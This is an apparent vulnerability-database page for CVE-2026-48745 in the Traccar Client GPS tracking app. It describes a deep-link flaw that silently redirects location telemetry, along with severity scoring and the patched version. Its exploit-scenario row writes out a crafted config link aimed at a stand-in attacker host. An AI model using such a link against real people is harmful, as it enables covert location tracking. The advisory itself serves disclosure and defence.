Traccar Client
CVE-2026-48745
CRITICAL
Severity by source
AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
Deep link is network-deliverable with low complexity and no privileges, but requires a single user tap (UI:R); telemetry redirection to a third-party server justifies S:C with high C and I impact and no availability effect.
Primary rating from Vendor (GitHub_M).
CVSS VectorVendor: GitHub_M
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
Lifecycle Timeline
2DescriptionCVE.org
Traccar Client is a GPS tracking mobile app for sending location updates to private servers using the open-source Traccar platform. In versions 9.7.19 and below, a single crafted deep link can silently hijack all GPS tracking parameters and redirect telemetry to an attacker-controlled server. The app registers a custom org.traccar.client://config deep-link scheme that silently writes attacker-supplied parameters (server URL, device ID, accuracy, distance, and interval) into the app's persistent configuration with no confirmation, notification, or visual indication. A single crafted link delivered via SMS, email, a webpage, or any installed app can therefore reconfigure the app the moment the victim taps it, with no special permissions required. As a result, an attacker can covertly redirect all of the victim's GPS telemetry to their own server at maximum precision and frequency, and the change persists across restarts. This gives the attacker continuous, real-time tracking of the victim's location. This issue has been fixed in version 9.7.20.
AnalysisAI
Silent configuration hijack in Traccar Client GPS tracking app (versions 9.7.19 and below) allows remote attackers to redirect victim telemetry to attacker-controlled servers via a single crafted org.traccar.client://config deep link. The app accepts deep-link parameters (server URL, device ID, accuracy, distance, interval) and writes them to persistent configuration with no user confirmation, enabling continuous covert location tracking. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires Traccar Client 9.7.19 or earlier installed on the victim device with the custom URI scheme org.traccar.client://config registered (the default install state), and the victim must tap or otherwise activate a crafted deep link (UI:R) delivered via SMS, email, web page, chat, or another installed app. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 9.3 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N) reflects scope change because telemetry from one app is redirected to a third-party server, but real-world severity depends heavily on the UI:R requirement - the victim must tap the malicious link. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker sends a victim an SMS, phishing email, or message containing a crafted org.traccar.client://config?server=attacker.example.com&id=victim1&accuracy=high&interval=10 link, or hosts it on a webpage the victim visits. When the victim taps the link, Traccar Client silently overwrites its server URL and reporting parameters with no confirmation, after which all GPS telemetry - at the attacker's chosen precision and frequency - flows to the attacker's server until the victim notices and reverts the settings. |
| Remediation | Vendor-released patch: upgrade to Traccar Client 9.7.20, which introduces an explicit 'Apply new configuration?' confirmation dialog before any deep-link-supplied parameters are written to persistent configuration (see commit 23558b0a and advisory GHSA-vm6j-6g39-gj97). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Inventory all Traccar Client instances running version 9.7.19 or below; restrict outbound connectivity to known legitimate Traccar servers where operationally feasible. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Same technique Information Disclosure
View allShare
External POC / Exploit Code
Leaving vuln.today